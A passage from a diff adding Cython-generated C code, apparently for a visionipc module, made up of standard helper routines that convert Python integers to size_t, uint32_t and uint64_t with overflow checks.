Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType"); + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType"); + return (enum __pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE size_t __Pyx_PyInt_As_size_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const size_t neg_one = (size_t) -1, const_zero = (size_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(size_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(size_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (size_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 2 * PyLong_SHIFT)) { + return (size_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 3 * PyLong_SHIFT)) { + return (size_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) >= 4 * PyLong_SHIFT)) { + return (size_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(size_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(size_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(size_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(size_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + return (size_t) ((((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(size_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(size_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + return (size_t) ((((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(size_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) (((size_t)-1)*(((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(size_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(size_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(size_t) - 1 > 4 * PyLong_SHIFT)) { + return (size_t) ((((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(size_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(size_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(size_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + size_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (size_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (size_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (size_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (size_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (size_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(size_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(size_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((size_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((size_t) 1) << (sizeof(size_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (size_t) -1; + } + } else { + size_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (size_t) -1; + val = __Pyx_PyInt_As_size_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to size_t"); + return (size_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to size_t"); + return (size_t) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE uint32_t __Pyx_PyInt_As_uint32_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint32_t neg_one = (uint32_t) -1, const_zero = (uint32_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(uint32_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (uint32_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint32_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(uint32_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 2 * PyLong_SHIFT)) { + return (uint32_t) (((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(uint32_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 3 * PyLong_SHIFT)) { + return (uint32_t) (((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(uint32_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 4 * PyLong_SHIFT)) { + return (uint32_t) (((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint32_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(uint32_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint32_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint32_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(uint32_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(uint32_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint32_t) ((((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(uint32_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint32_t) ((((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(uint32_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint32_t) ((((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(uint32_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint32_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + uint32_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (uint32_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (uint32_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint32_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (uint32_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (uint32_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(uint32_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((uint32_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(uint32_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((uint32_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((uint32_t) 1) << (sizeof(uint32_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (uint32_t) -1; + } + } else { + uint32_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (uint32_t) -1; + val = __Pyx_PyInt_As_uint32_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to uint32_t"); + return (uint32_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to uint32_t"); + return (uint32_t) -1; +} + +/* CIntFromPy */ + static CYTHON_INLINE uint64_t __Pyx_PyInt_As_uint64_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint64_t neg_one = (uint64_t) -1, const_zero = (uint64_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(uint64_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(uint64_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (uint64_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint64_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(uint64_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) >= 2 * PyLong_SHIFT)) { + return (uint64_t) (((((uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(uint64_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) >= 3 * PyLong_SHIFT)) { + return (uint64_t) (((((((uint64_t)digits[2]) << PyLong_SHIFT) | (uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(uint64_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) >= 4 * PyLong_SHIFT)) { + return (uint64_t) (((((((((uint64_t)digits[3]) << PyLong_SHIFT) | (uint64_t)digits[2]) << PyLong_SHIFT) | (uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint64_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(uint64_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint64_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint64_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint64_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint64_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(uint64_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint64_t) (((uint64_t)-1)*(((((uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(uint64_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint64_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint64_t) ((((((uint64_t)digits[1]) << PyLong_SHIFT) | (uint64_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(uint64_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint64_t, long, -(long) 